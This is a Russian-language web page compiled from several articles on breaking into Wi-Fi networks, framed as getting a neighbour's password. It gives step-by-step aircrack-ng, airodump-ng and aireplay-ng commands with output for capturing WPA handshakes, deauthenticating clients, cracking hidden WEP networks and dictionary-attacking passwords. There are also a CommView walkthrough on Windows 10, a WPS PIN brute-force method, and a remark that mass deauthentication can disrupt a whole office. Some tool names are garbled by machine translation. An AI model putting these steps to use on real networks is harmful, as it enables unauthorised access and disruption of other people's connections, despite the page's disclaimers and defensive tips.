Взлом точка доступа виндовс 10: 6 Способов Как Узнать (Взломать) Пароль от Wi-Fi Соседа

Содержание

Как узнать, взломан ли ваш Wi-Fi

Современные способы аутентификации в роутерах не позволяют взломать точку доступа, если установлен достаточно надежный пароль. Тем не менее кое-какие более старые методы имеют известные уязвимости и взламывались неоднократно. Для подключения к чужому Интернету иногда даже не обязательно подбирать пароль – некоторые неопытные пользователи при настройке роутера оставляют точку доступа открытой, и в результате к ней может подключиться любой желающий. Узнать о том, используется ли ваше Wi-Fi-соединение посторонними, можно несколькими способами.

Способы обнаружения

«Дырявый» Wi-Fi означает не только снижение скорости загрузки из Интернета. Если на компьютере есть общие папки, то другие пользователи получат к ним доступ. Также чужая точка может стать отличным прикрытием для совершения незаконных действий в Сети.

IP-адрес роутера можно узнать с помощью команды ipconfig

1. Итак, первым звонком, сигнализирующим о том, что Wi-Fi-соединением пользуется кто-то еще, является регулярное снижение скорости доступа в Интернет. У этого факта есть и сотня других причин, но уточнить стоит всегда. Чтобы наверняка проверить свою догадку, необходимо применить один из методов, которые будут описаны чуть ниже.

2. Навскидку интенсивность использования точки доступа можно определить и по индикаторам. Лампочка WAN (или аналогичная) должна быть активна в том случае, когда роутер обменивается информацией по Интернету. Если вы уверены, что все устройства в данный момент отключены, а лампочка все равно мерцает, не исключено, что серфингом по Сети занимаетесь не вы одни. Конечно, у этого способа есть свои недостатки. Во-первых, обилие устройств с Wi-Fi (смартфоны, ноутбуки, консоли, домашняя техника) приводит к тому, что отключать их все не очень удобно, долго и, кроме того, всегда можно что-то пропустить. Также сложно сказать, как именно работает индикатор на каждом конкретном роутере. Он вполне может периодически мерцать, даже если все устройства деактивированы.

3. Надежным и в то же время быстрым является метод просмотра таблицы подключенной к роутеру техники. Для этого необходимо набрать в браузере его IP-адрес. По умолчанию это обычно «192.168.1.1». В случае применения другого его можно узнать в свойствах сетевого подключения. Универсальным приемом для любой версии Windows является использование командной строки. Следует запустить командный интерпретатор (Пуск→Поиск→cmd + нажать Enter) и выполнить команду ipconfig. В разделе Ethernet adapter Local Area Connection адрес роутера отобразится напротив надписи Default Gateway.

Список подключенных устройств в настройках роутера

После того как адрес точки доступа введен в веб-обозревателе, появится окно с запросом имени пользователя и пароля. Данные по умолчанию, как правило, указаны в документации модели или даже на ней самой. Зачастую применяются комбинации admin/admin, admin/1234 или просто пустые поля.

В появившемся окне настроек роутера необходимо найти раздел с перечнем подключенных устройств – называться он может, например, Client List или Connected Devices. В самом списке будут отображаться те из них, которые в текущий момент соединены с Интернетом через вашу точку доступа. Идентифицировать среди них свои можно по IP-, MAC-адресу или названию. Если в перечне обнаружены «чужаки», то их желательно занести в черный список. Но если вы сомневаетесь, что это несанкционированное подключение, просто временно понизьте ему приоритет до выяснения подробностей.

4. Системные средства и роутер не позволяют получить всю информацию об активных соединениях. Дополнительные данные поможет узнать специальная бесплатная утилита MoocherHunter, применяемая некоторыми правоохранительными органами для поиска Wi-Fi-воров. Как говорят разработчики, программа анализирует сетевой трафик и с точностью до 2 метров определяет местоположение устройства, обменивающегося информацией с Wi-Fi-точкой доступа.

Приложение распространяется в виде загрузочного образа. Взяв ноутбук и недорогую направленную антенну (directional antenna), которую необходимо приобрести отдельно, пользователь должен перемещаться в пространстве, чтобы методом триангуляции определить местоположение мошенника.

Средства защиты

Если Wi-Fi-соединение не защищено паролем, первым делом следует его установить. В противном случае можете не сомневаться, что подключение к нему посторонних лиц – всего лишь вопрос времени. Если пароль указан, но кто-то все равно подключился к роутеру, значит, пароль или метод защиты оказались слабыми. Пароль рекомендуется изменить и по возможности усложнить (сделать более длинным, добавить цифры), а в качестве протокола защиты выбрать WPA2-AES, поскольку в предыдущих (например, WEP) найдены определенные уязвимости, упрощающие взлом.

В ряде случаев использование WPA2 невозможно. Например, его не поддерживают относительно старые роутеры или операционные системы Microsoft до Windows XP SP2. Некоторые устройства могут видеть такие сети, но не умеют к ним подключаться. Тогда желательно установить протокол WPA. Если и с ним соединения не произойдет (например, у Nintendo DS не получится этого сделать), то можно перейти на WEP, что все же лучше, чем полная открытость.

Рекомендуется изменить пароль и на сам роутер (тот, который по умолчанию admin). Это выполняется в настройках устройства в разделе администрации.

Взлом Wi-Fi-сетей, защищённых WPA и WPA2 / Хабр

Автор статьи, перевод которой мы сегодня публикуем, хочет рассказать о том, как взломать Wi-Fi-сеть, для защиты которой используются протоколы WPA и WPA2.


Статья написана исключительно в ознакомительных целях


Аппаратное и программное обеспечение

Я буду пользоваться дистрибутивом Kali Linux, установленным на VMware Workstation.

Кроме того, в моём распоряжении имеется Wi-Fi-адаптер Alfa AWUS036NH 2000mW 802.11b/g/n. Вот его основные характеристики:

  • Стандарты: IEEE 802.11b/g/n, USB 2.0.
  • Скорости передачи данных: 802.11b — 11 Мбит/с, 802.11g — 54 Мбит/с, 802.11n — 150 Мбит/с.
  • Разъём для подключения антенны: 1 x RP-SMA.
  • Частотные диапазоны: 2412~2462 МГц, 2412~2472 МГц, 2412~2484 МГц.
  • Питание: 5В.
  • Безопасность: WEP 64/128, поддержка 802.1X, WPS, WPA-PSK, WPA2.

Шаг 1

Нужно запустить Kali Linux в VMware и подключить к системе Wi-Fi-адаптер Alfa AWUS036NH, выполнив следующую последовательность действий:

VM > Removable Devices > Ralink 802.11n USB Wireless Lan Card > Connect


Подключение Wi-Fi-адаптера к ОС, работающей в VMware

Шаг 2

Теперь обратите внимание на средства управления Wi-Fi-подключениями в Kali Linux.


Управление Wi-Fi-подключениями в Kali Linux

Шаг 3

Откройте терминал и выполните команду

airmon-ng

для вывода сведений об интерфейсах беспроводных сетей.


Вывод сведений об интерфейсах беспроводных сетей

Шаг 4

Как видно, интерфейсу назначено имя

wlan0

. Зная это, выполним в терминале команду

airmon-ng start wlan0

. Благодаря этой команде Wi-Fi-адаптер будет переведён в режим мониторинга.


Перевод адаптера в режим мониторинга

Шаг 5

Теперь выполните такую команду:

airodump-ng wlan0mon

. Это позволит получить сведения о Wi-Fi-сетях, развёрнутых поблизости, о том, какие методы шифрования в них используются, а так же — о SSID.


Сведения о Wi-Fi-сетях

Шаг 6

Теперь воспользуемся такой командой:

airodump-ng -c [channel] –bssid [bssid] -w /root/Desktop/ [monitor interface]

В ней

[channel]

надо заменить на номер целевого канала,

[bssid]

— на целевой BSSID,

[monitor interface]

— на интерфейс мониторинга

wlan0mon

.

В результате моя команда будет выглядеть так:

airodump-ng -c 6 –bssid 4C:ED:FB:8A:4F:C0 -w /root/Desktop/ wlan0mon


Выполнение команды

Шаг 7

Теперь нужно подождать. Утилита

airodump

будет мониторить сеть, ожидая момента, когда кто-нибудь к ней подключится. Это даст нам возможность получить handshake-файлы, которые будут сохранены в папке

/root/Desktop

.

Вот как выглядит работа утилиты до того момента, как кто-то подключился к исследуемой сети.


Программа наблюдает за сетью

А вот что происходит после того, как то-то к сети подключился, и программе удалось получить нужные данные.


Получение необходимых данных

Шаг 8

Вы можете пропустить этот шаг в том случае, если у вас уже есть handshake-файлы. Здесь описан альтернативный способ получения соответствующих данных.

Речь идёт об использовании следующей команды:

aireplay-ng -0 2 -a [router bssid] -c [client bssid] wlan0mon

Здесь

[router bssid]

нужно заменить на BSSID Wi-Fi-сети, а

[client bssid]

— на идентификатор рабочей станции.

Эта команда позволяет получить handshake-данные в том случае, если вам не хочется ждать момента чьего-либо подключения к сети. Фактически, эта команда атакует маршрутизатор, выполняя внедрение пакетов. Параметр -0 2 можно заменить другим числом, например, указать тут число 50, или большее число, и дождаться получения handshake-данных


Использование утилиты aireplay-bg

Шаг 9

Теперь воспользуемся такой командой:

aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap

  • -a2 означает WPA.
  • -b — это BSSID сети.
  • -w — это путь к списку паролей.
  • *.cap — это шаблон имён файлов, содержащих пароли.

В моём случае эта команда выглядит так:

aircrack-ng -a2 -b 4C:ED:FB:8A:4F:C0 -w /root/Desktop/ww.txt /root/Desktop/*.cap

После выполнения этой команды начнётся процесс взлома пароля. Если пароль будет успешно взломан — вы увидите что-то, похожее на следующий скриншот.


Успешный взлом пароля

Как вы контролируете безопасность своих беспроводных сетей?

Все, что нужно для взлома сети Wi-Fi

Основные инструменты для аудита сетей Wi-Fi

Сканер сети Wi-Fi

Их можно установить на мобильные телефоны и компьютеры Android / iOS. Это один из самых простых инструментов в настройке и использовании. Поскольку они позволяют вам получить полный обзор всех ближайших к вам точек беспроводного доступа. Вы получите доступ к наиболее важным деталям, уровню сигнала, типу используемого шифрования и MAC-адресу точки доступа.

Вы можете воспользоваться поездками, столкнувшись с сетями, в которых используются слабые протоколы безопасности, такие как WEP или старая версия популярного WPA. Если есть точки доступа со скрытыми или неопределенными SSID, некоторые поездки могут их выявить. Если вы используете этот инструмент на уровне предприятия, вы можете обнаружить людей, которым может потребоваться внутренняя сеть. Для операционных систем Windows лучшим сканером сети Wi-Fi является

Акриловый WiFi , и Professional WiFi Acrylic с большим количеством параметров отображения и даже с возможностью создания собственных сценариев.

Этот класс инструментов намного удобнее использовать на мобильных телефонах, в основном за счет их удобства и мобильности. Куда бы вы ни пошли, вы можете рассчитывать на инструмент, который сканирует сети Wi-Fi, установленные на вашем мобильном телефоне, и получает информацию, которая вам нужна в данный момент. Альтернатива для Android-устройств называется Анализатор WiFi он полностью бесплатен и отображает информацию о точках доступа в районе диапазонов 2,4 ГГц и 5 ГГц, если они найдены.

Анализатор Wi-Fi

Разработчик: FARPROC

Если вам нужно сохранить отображаемую информацию, вы можете экспортировать ее в формате XML, чтобы потом адаптировать ее к своим потребностям, или просто поделиться тем же файлом по электронной почте. Он имеет графики, детализирующие уровень сигнала, его историю и уровень использования. Он имеет встроенный индикатор сигнала, который позволяет находить точки доступа рядом с вами.

Если у вас есть какие-либо мобильные варианты iOS, вы можете скачать и попробовать Сетевой анализатор Pro . Это не бесплатно, но у него есть множество функций, которые делают его довольно всеобъемлющим, как и в случае с приложением для Android.

Сетевой анализатор Pro

Разработчик: течёт

Инструменты, отображающие другие сведения о беспроводной сети

Важность этих инструментов заключается в том, что они показывают, как взломанное или украденное устройство может содержать много конфиденциальной информации, а также различные документы или файлы. Это также подчеркивает важность использования аутентификации типа. 802.1x когда пользователи имеют индивидуальные учетные данные для доступа к сети Wi-Fi, особенно в корпоративной среде или в местах, где такое подключение предлагается как услуга или средство.

WirelessKeyView это инструмент, который может вам помочь. Он бесплатный и содержит список всех ключей WEP, WPA и WPA2, которые были сохранены на вашем компьютере с Windows в любой момент времени.

С другой стороны, Aircrack-нг представляет собой набор инструментов с открытым исходным кодом для взлома ключей WEP и WPA / WPA2, который начинает обновляться для сетей WPA3. Он совместим с Windows, Mac OS X, Linux и OpenBSD. Кроме того, вы можете просматривать точки доступа рядом с вами, в том числе со скрытыми или недоступными SSID. Он также имеет функции сниффера, которые захватывают пакеты, вводят и реплицируют трафик, и, конечно же, он может расшифровывать пароли доступа, в зависимости от того, было ли для него захвачено достаточно пакетов (в случае WEP), или если вы захватили рукопожатие в случае WPA / WPA2.

Снифферы Wi-Fi

В отличие от сканеров беспроводных сетей, снифферы идут еще дальше, собирая информацию о точках доступа, которая используется для анализа пакетов, передаваемых по беспроводной сети. Захваченную информацию о трафике можно импортировать в другие инструменты, которые могут быть у нас, например в взломщик aircrack-ng.

Существуют снифферы, которые могут анализировать пакеты, проходящие через сеть, и / или шифровать их. Кроме того, другие типы снифферов сообщают только об определенных типах сетевого трафика, а также о тех, которые предназначены для обнаружения паролей в виде обычного текста.

Судьба это очень полное бесплатное решение с открытым исходным кодом и полной документацией. Он имеет функции отключения, анализатора пакетов и даже систему обнаружения вторжений. Последний можно запустить в Windows 10 с использованием структуры WSL, Mac OS X, Linux и BSD. Просмотрите точки доступа, их SSID и те, у которых их нет или они скрыты, они не могут скрыться от этого инструмента.

Как мы уже упоминали, ему удается захватывать пакеты, которые затем можно импортировать в другие известные инструменты, такие как Wireshark, TCPdump и другие. Пока и в исключительных случаях, если вы используете Windows, Kismet работает только с адаптерами CACE AirPcap Wi-Fi. Это связано с ограничениями самой операционной системы. Однако он поддерживает большое количество адаптеров в Mac OS X и Linux.

Если вы хотите перейти на следующий уровень, мы рекомендуем CommView Wi-Fi . Это одно из самых популярных и всеобъемлющих решений, которые мы можем найти. Хотя это не бесплатный инструмент, вы можете протестировать все его функции с помощью 30-дневной пробной версии. Одной из его сильных сторон является наличие специального модуля VoIP, который позволяет проводить подробный анализ, включающий записи и воспроизведение типа SIP и голосовую связь типа H.323.

С помощью этого решения пакеты могут быть дешифрованы с использованием ключей WEP или WPA / WPA2-PSK и декодированы до самого нижнего экземпляра. Он поддерживает более 100 протоколов, а его древовидная структура дает вам полный обзор каждого захваченного пакета, показывая протоколы, применяемые на каждом уровне, и их заголовки. Он довольно широкий и очень эластичный.

Kali Linux: звезда хакерского мира

Невозможно перестать рекомендовать операционную систему, ориентированную на взлом. Kali Linux является довольно популярным и позволяет не только выполнять обычную установку в стиле Linux на компьютере, но и переносить его на загрузочный диск. Более того, вы можете запустить его на любом другом компьютере как виртуальную машину, используя VMWare, Virtual Box и другие.

Среди большого количества инструментов исследование компьютер, который он содержит, вы можете найти некоторые ориентированные на выполнение крутизна тестов в Wi-Fi сетях . Отметим, что включены Kismet (уже упомянутый выше) и Aircrack-ng. Эта операционная система полностью бесплатна, а предлагаемые нами инструменты имеют высокий уровень поддержки на ее веб-сайте. В вашем распоряжении вся необходимая документация, чтобы начать с нуля. Некоторые из ведущих инструментов для аудита сетей Wi-Fi:

  • грабитель : Взломайте сеть, в которой включен WPS с PIN-кодом, поэтому, если в вашей сети Wi-Fi включен WPS, мы рекомендуем вам отключить его.
  • FreeRadius-WPE выполняет нападения средний человек во время аутентификации 802.1x
  • Wi-Fi Мед создает своего рода приманку, которая привлекает людей, которые хотят подключиться к точке доступа. Следовательно, он создает поддельные точки доступа для перехвата генерируемого ими трафика и выполнения атак типа «злоумышленник в середине».

Если вы хотите углубить свои знания о Kali Linux, вы можете получить доступ к их  официальный сайт курс, где вы можете получить сертификат Kali Linux Certified Professional. Вы смеете делать больше?

WiFiSlax: лучшие сети Wi-Fi в Испании

Еще один дистрибутив на основе Linux, который мы не можем забыть для аудита Wi-Fi, — это WiFiSlax, базовый дистрибутив, который имеет больше инструментов для сетей Wi-Fi, чем Kali Linux, поэтому, если вы собираетесь сосредоточиться конкретно на беспроводных сетях Wi-Fi — Fi, лучше использовать WiFiSlax, который также полностью бесплатен.

Очень важным аспектом этого дистрибутива является то, что он разработан в Испании, и у этого есть фундаментальная сила: он объединяет ключевые словари, используемые маршрутизаторами Movistar, Orange или Vodafone, чтобы ускорить взлом паролей для проверки того, может ли ваш ключ WPA2 быть скомпрометированным. Внутри у нас есть большое количество всевозможных инструментов из знаменитого пакета взлома Aircrack-ng, а также инструменты, отвечающие за создание словарей для последующего использования в Aircrack-ng.

Протокол WPS является наиболее часто используемым вектором входа в сети Wi-Fi, и его очень легко взломать с помощью грубой силы или словаря. В WiFiSlax есть инструменты, отвечающие за расшифровку этого WPS методом грубой силы, проверяющие тысячи комбинаций, пока мы не найдем правильный PIN-код. Кроме того, у него также есть словари WPS, которые позволят нам сначала протестировать наиболее часто используемые PIN-коды на определенном беспроводном маршрутизаторе. Эти инструменты предназначены для доступа к сетям Wi-Fi за считанные минуты.

Помните, что вам не нужно взламывать чужие сети Wi-Fi чтобы проверить свои навыки. Вы можете поэкспериментировать со своей группой друзей или, если вы один, вы можете попробовать свою собственную сеть. Вход в мир взлома открывает двери знаний, которые вы можете использовать для достижения личного удовлетворения.

Взлом чужой точки доступа Wi-Fi. :: Блог Михаила Калошина

В последнее время многих интересует вопрос, как взломать чужой Wi-Fi: кто-то интересуется с целью просто использовать чужой Интернет, но есть и такие, которым необходим доступ к домашней сети конкретного человека.

Лично мне известно несколько таких способов с разной реализацией — есть легкие и сложные, есть быстрые и долгие.

Расскажу о самом простом методе/способе, который не требует особых навыков, не зависит от протокола шифрования (WEP/WPA) и прост в реализации — это подбор WPS пин-кода от роутера (маршрутизатора).
_________________________________________________________________________

_________________________________________________________________________
Почему это работает?
У большинства домашних роутеров есть и по умолчанию включена функция подключения к Wi-Fi сети при помощи ввода WPS пин-кода (что это такое — детально можно почитать здесь, но если кратко — это цифровой код из 8 цифр), этот пин-код может быть записан на самом устройстве или в панели управления/настройки роутера. На устройстве, которое необходимо подключить к сети интернет через Wi-Fi, вводится WPS пин-код, после чего роутер обменивается необходимой информацией с устройством и передает ему пароль от Wi-Fi сети.

Как это работает?
Для реализации этого метода не нужно никаких специальных знаний/навыков — есть уже готовые программы для ОС Windows (слышал, видел, но не пробовал) и ОС Linux (есть ряд/комплекс программ, которые позволяют выполнить подбор пин-кода, также существуют и специализированные ОС Linux/программы, которые могут автоматизированно подбирать/взламывать беспроводные сети, используя все известные на конкретный день уязвимости Wi-Fi). И, на мой взгляд, самые интересные — это специализированные прошивки для мобильных устройств (телефонов/планшетов/мобильных роутеров), которые могут выполнять те же функции, что и специализированные программы на обычных ОС Windows/Linux, при этом находясь в кармане или в рюкзаке 🙂

В указанных выше программах/прошивках достаточно выбрать из списка название Wi-Fi сети и нажать старт, после чего программа самостоятельно начинает подбирать пин-код, что может занять от 10 минут до 8-10 часов при хорошем сигнале антенны, и от 10 до 168 часов при плохом сигнале.

В случае успешного подбора/атаки на WPS, роутер выдает пароль от беспроводной сети, и теперь злоумышленник, используя этот пароль, может подключить к чужой Wi-Fi сети и другие свои устройства (например, те, которые не поддерживают подключение по WPS).

Как можно определить, что вашим интернетом еще кто-то пользуется?

Метод не 100%-ный, но хоть что-то:

  • Включить журнал/лог подключений и периодически его просматривать.

  • Заходить в панель управления роутером и просматривать список подключенных устройств (например, у вас телефон, планшет и ноутбук — откуда взялся еще один телефон или ноутбук?).

  • В списке подключенных устройств два активных устройства с одним и тем же MAC-адресом.


В большинстве случаев, злоумышленник при атаке на Wi-Fi сеть пытается скрыть свое присутствие и может выполнить такие действия:
  • Сменит свой MAC-адрес на один из MAC-адресов ваших устройств или любой другой (защита по фильтру MAC-адресов не поможет).

  • Если возможно, выключит журнал/лог подключений.

  • Сменит пароль от панели управления роутером с целью недопущения вами входа, чтобы вы не смогли зайти и увидеть, какие настройки были им сделаны, например, настройки приоритета трафика (злоумышленник увеличил пропускную полосу (т.е. скорость передачи данных) для своего устройства). К тому же, если вы по какой-то необходимости не сможете подключиться к роутеру, то, скорее всего, вы сбросите его к заводским настройкам, что приведет к полному уничтожению информации о присутствии злоумышленника в вашей сети.


Что делать и как защититься от подбора/взлома домашнего роутера?

После публикации данной уязвимости в сети, производители роутеров доработали протокол WPS: кто-то обновил прошивки с минимальной защитой, а кто-то отключил по умолчанию данную функцию. Но на бюджетных моделях или более ранних (не обновленных) данная уязвимость осталась.

Хочу обратить ваше внимание, что длинна и сложность пароля не имеет значения, если ваш роутер уязвим перед WPS.

Несколько рекомендаций по защите вашего домашнего роутера:

  • Обновите прошивку роутера — возможно, производитель внес необходимые исправления.

  • Отключите WPS, если вы не знаете/не уверены, исправил ли производитель данную уязвимость 🙂 — банально, но это усложнит злоумышленнику работу.

  • Используйте WPA2.

  • Используйте длинный и сложный пароль (4 уровня сложности*) — в случае отключенного WPS при перехвате злоумышленником пароля Wi-Fi сети в закрытом виде, ему будут необходимы большие ресурсы (вычислительные мощности) и время для перебора паролей.

  • Регулярно меняйте пароль — чем длиннее и сложнее пароль, тем больше времени и ресурсов необходимо на его подбор. На мой взгляд, для домашнего роутера 8-значный с 4-мя уровнями сложности пароль лучше менять минимум раз в 3 месяца.

  • Используйте разные пароли — на вход в панель управления роутером и на подключение к Wi-Fi сети.

  • Создайте гостевую точку — многие роутеры позволяют создать отдельную точку доступа для гостей, это уменьшит количество людей, которые знают ваш основной пароль.

*4 уровня сложности — Цифры, Прописные буквы, Строчные буквы, Специальные символы ( %, *, ),?, @, #, $, ~).
Если у вас есть сложности с выбором сложного пароля, воспользуйтесь генератором паролей (в интернете их большое количество) или картой паролей, например, этой — по данной ссылке для каждого генерируется своя карта, напоминает игру морской бой 🙂 — если будут сложности, пишите в комментариях. Также для подключения к Wi-Fi сети можно использовать специальный QR-код, ранее я уже писал об этом здесь: “QR-код для подключения к Wi-Fi”.

Внимание!

Данная заметка подготовлена исключительно в ознакомительных целях.

Тестирование способов подбора WPS пин-кода роутера проводилось на моем личном оборудовании.

Картинка логотипа взята с сайта inforkomp.com.ua

_________________________________________________________________________

_________________________________________________________________________

Взлом скрытой Wi-Fi сети

Взлом скрытой WiFi сети WEP

Сегодня покажу вам, как взламывать скрытую WiFi-сеть. Как всегда, ничего сложного в этом нет. Скрытые WiFi сети, фильтрация по MAC-адресам все это не спасет никого. На мой взгляд, такие методы защиты не эффективны, но это не значит, что ими нужно пренебрегать!

Смотрим список wi-fi сетей в радиусе действия.

Красным цветом подчеркнута наша точка доступа (AP), SSID которой скрыт от посторонних. Настраиваемся на нее.

# airodump-ng -c 1 -w wep_hidden —bssid 00:22:B0:BE:75:3D mon0

  • -c – номер канала
  • -w – название дамп-файла
  • –bssid – MAC-адрес точки доступа

Теперь делаем деаутентификацию клиента. После чего, если взглянуть в окно консоли где работает airodump-ng, то увидим название нашей wi-fi сети.

Для справки: если взломать точку доступа (AP) не получается, с некоторыми AP такое бывает, но черное дело сделать надо, тогда вместо значения 1 подставляем значение, например 999999. После чего клиент не сможет подключиться к AP, но только до тех пор, пока будет работать эта команда. Следовательно, так можно нарушить работу целого офиса и т.п..

# aireplay-ng -0 1 -a 00:22:B0:BE:75:3D -c 70:F1:A1:72:B4:25 mon0

  • -0 – деаутентификация
  • 1 – количество пакетов
  • -a – MAC-адрес точки доступа
  • -c – MAC-адрес клиента, к которому применяется деаутентификация

    14:02:32  Waiting for beacon frame (BSSID: 00:22:B0:BE:75:3D) on channel 1

    14:02:33  Sending 64 directed DeAuth. STMAC: [70:F1:A1:72:B4:25] [26|26 ACKs]

Деаутентификация прошла успешно. Теперь посмотрим, на работу airodump-ng, как видим wi-fi сеть теперь не скрыта.

Дальше применим вот такой тип атаки.

# aireplay-ng -3 -b 00:22:B0:BE:75:3D -h 70:F1:A1:72:B4:25 mon0

  • -3 – arp request replay
  • -b – MAC-адрес точки доступа
  • -h – MAC-адрес клиента

The interface MAC (00:C0:CA:30:85:7A) doesn’t match the specified MAC (-h). ifconfig mon0 hw ether 70:F1:A1:72:B4:25

14:04:26  Waiting for beacon frame (BSSID: 00:22:B0:BE:75:3D) on channel 1

Saving ARP requests in replay_arp-1223-140426.cap

You should also start airodump-ng to capture replies.

Notice: got a deauth/disassoc packet. Is the source MAC associated ?

287654 packets (got 50202 ARP requests and 85270 ACKs), sent 146528 packets…(500 pps)

Опять делаем деаутентификацию клиента. После чего полетят Data-пакеты.

# aireplay-ng -0 1 -a 00:22:B0:BE:75:3D -c 70:F1:A1:72:B4:25 mon0

 

14:02:32  Waiting for beacon frame (BSSID: 00:22:B0:BE:75:3D) on channel 1

14:02:33  Sending 64 directed DeAuth. STMAC: [70:F1:A1:72:B4:25] [26|26 ACKs]

Когда Data-пакетов накопилось достаточно, можем их расшифровывать.

# aircrack-ng -a 1 -0 wep_hidden.cap

  • -a – bruto-force атака (1 = WEP, 2 = WPA/WPA2-PSK)
  • 1 – WEP
  • -0 – использовать цвет

Еще по теме: Как узнать имя скрытой сети WiFi и обойти фильтрацию по MAC

Хендшейк WiFi в Windows 10. Перехват, расшифровка, брутфорс

Zip File, мамкины хакеры. После того, как на канале стали регулярно выходить ролики по взлому с использованием такого замечательного инструмента, как Kali Linux, подписчики в комментариях интересуются, можно ли проделать, нечто подобное из-под обычной винды. Перехватить хендшейк, брутфорснуть его словарём. И всё это исключительно с использованием Windows 10.

Честно признаться, я очень долго оттягивал запись этого ролика. Просто потому, что порог вхождения в тему пентестинга и те знания, которые для этого требуются по моему мнению должны хоть немного превышать уровень среднестатистического пользователя и в большей степени оставаться прерогативой админов и безопасников.

Однако, раз уж есть стабильный спрос, давайте сегодня наконец удовлетворим просьбы страждущих ответив на насущный вопрос. Да, перехват хендшейка и последующий подбор посредством брутфорса вполне возможен и из-под обычной винды. Правда для этого придётся дополнительно скачать несколько утилит.

CommView for Wifi Windows 10

Шаг 1. Первая – это CommView for WiFi. Достаточно популярная прога для мониторинга и анализа пакетов под Windows. Во времена моей преподавательской деятельности, для тех, кто не в курсе, до недавнего времени я вёл практику у сетевых и системных администраторов в местном техникуме.

Так вот, в то время я уделял ей особое внимание. Её интерфейс гораздо дружелюбнее, нежели у того же WireShark’а, а функций в полнофункциональной версии хватает с головой. Сейчас же, для быстрой демонстрации я воспользуюсь демкой. На офф сайте tamos.ru открываем раздел «Загрузка» и кликаем по кнопке скачать напротив названия нужного нам продукта.

Шаг 2. Откроется страница с перечислением всех адаптеров, которые поддерживаются программой. Список, мягко говоря, не велик. У меня подходящая плата была только в ноутбуке жены, поэтому большая часть урока записана на нём. Надеюсь, вам повезёт больше. После того, как убедились, что сетевуха подходит, кликаем «Скачать CommView for WiFi».

Шаг 3. И по завершению загрузки запускаем установочный EXE’шник внутри архива.

Шаг 4. Next.

Шаг 5. Принимаю.

Шаг 6. Стандартный режим. Никакой IP-телефонии нам не нужно.

Шаг 7. Путь установки по дефолту.

Шаг 8. Язык – русский. Ярлыки создать.

Шаг 9. Погнали.

Шаг 10. После завершения установки, жмём «Finish».

Шаг 11. И ждём, пока откроется главное окно. Видим, что прога нашла совместимый адаптер и предлагает нам установить собственный драйвер. Сразу предупрежу, что после его установки ваша сетевуха перестанет работать в штатном режиме и перейдёт в режим монитора. Сети при это не будут видеться через стандартную службу Windows. Далее, я покажу, как это исправить. Но сначала завершим начатое. Скрепя сердце жмём «Далее».

Шаг 12. Установить драйвер.

Шаг 13. После инсталляции непременно перезагружаем компьютер.

Как пользоваться CommView For Wifi

Шаг 14. Отлично. Дождавшись включения запускаем ярлычок CommView и в главном окне программы выбираем справа режим сканирования всех каналов.

Шаг 15. Видим предупреждение о том, что оценочная версия позволяет захватывать трафик не дольше 5 минут. Нам, признаться, дольше то и не нужно. Кликаем «Продолжить».

Шаг 16. Дожидаемся, пока наша сеть появится в списке и тормозим сканирование. Запоминаем, а ещё лучше записываем MAC-адрес точки, SSID и номер канала, на котором она работает в данный момент.

Шаг 17. Переводим программу в одноканальный режим и указываем уже конкретно канал нашей точки. Врубаем перехват заново.

Шаг 18. И чтобы не ждать, пока одно из устройств отключится, а затем подключится к роутеру, дабы инициировать «Рукопожатие», отправим пакеты деаутентификации. Вкладка «Инструмента» — «Реассоциация узлов».

Шаг 19. Послать 100 пакетов с интервалом 10 мсек. Проверяем точку. Смотрим клиентов. Рекомендую откидывать не более 1 за раз. Послать сейчас. Всё. Ждёмс. Яблочное устройство отвалилось и вновь законнектилось, а значит можно двигаться дальше.

class=»eliadunit»>

Шаг 20. Тормозим перехват.

Шаг 21. И переходим на вкладку «Пакеты». На самом деле из всей этой истории нас интересуют только EAPOL паки. В момент коннекта устройство обменивается с роутером 4 пакетами этого типа. Внутри содержится пароль от точки в зашифрованном виде. Совсем скоро мы его достанем и дешифруем. Вызываем контекстное меню, «Открыть пакеты в новом окне» — «Все».

Шаг 22. Далее «Файл» — «Экспорт log-файлов» — «Формат Wireshark/Tcpdump».

Шаг 23. Указываем место для сохранения и присваиваем файлу понятное имя. «Сохранить».

CommView For Wifi не видит сети

Шаг 24. Усё. CommView можно закрывать и переходить к загрузке второй программы. Однако тут возникнет сложноcть о которой я уже упоминал ранее. Сетки не видятся. Нужно восстановить нормальный драйвер.

Шаг 25. Запускаем «Диспетчер устройств».

Шаг 26. В списке сетевых адаптеров ищем тот, что содержит приписку «CommView» и идём в «Свойства».

Шаг 27. На вкладке драйвер кликаем по заветной кнопочке «Откатить».

Шаг 28. Указываем причину. Предыдущая версия работала явно лучше. Жмём «ОК».

Шаг 29. И после завершения отката проверяем список сеток. Тэкс. Всё хорошо. Инет снова работает.

Aircrack-ng Windows 10

Шаг 30. Открываем браузер и переходим на сайт aircrack-ng.org. Тут прям на главной странице есть кнопка загрузки утильки под винду. Качаем.

Шаг 31. И после загрузки распаковываем всю эту историю в отдельную папку. Внутри открываем каталог «bin» и запускаем файлик «Aircrack-ng GUI». Это старый добрый эир, но с графическим интерфейсом. Хоть какое-то преимущество от использования Виндовса.

Шаг 32. Выбираем тип – «WPA». В первой строчке указываем путь к файлу с добытым ранее хендшейком.

Шаг 33. Во второй указываем путь к словарю. Ссылку на те, что юзаю я, найдёте в описании к видео.

Шаг 34. Ставим галочку «Advanced option» и указываем имя интересующей нас точки и MAC-адрес. Помните, ранее, я специально просил вас зафиксировать эти данные. Жмём «Launch».

Шаг 35. Пошла жара. Если пассворд присутствует в словаре, он обязательно дешифруется через какое-то время.

Как-то так, друзья. Напоминаю, что все действия я демонстрирую исключительно в целях повышения уровня вашей осведомлённости в области пентестинга и информационной безопасности.

Устройства и точки, используемые в качестве жертвы в уроках, принадлежат мне. Вам в свою очередь, я крайне не рекомендую повторять подобные вещи на своих девайсах и уж точно ни в коем случае не испытывайте судьбу на чужих.

При таком сценарии данные действия могут быть расценены, как противоправные и привести к печальным последствиям. Лучше используйте полученные знания во благо и обезопасьте себя и своих близких от взлома подобного рода.

Сделать это очень просто. Достаточно использовать сложный пароль. С буквами в верхнем и нижнем регистре, цифрами и спец. символами. Перевести WiFi на роутере в режим 5ГГц и сформировать белый список с MAC-адресами ваших устройств.

Кстати, если вам действительно интересна тема сетей, их безопасности, но вы пока не готовы к переходу на Linux, рекомендую вам ознакомиться с моим обучающим курсом по Администрированию Windows Server 2016.

В нём я рассматриваю основные моменты, касательно контроля сети с использованием штатных средств данной ОС. Грамотную настройку групповых политик, разграничение доступа посредством квот и многое другое. Ссылку с подробностями ищите в описании.

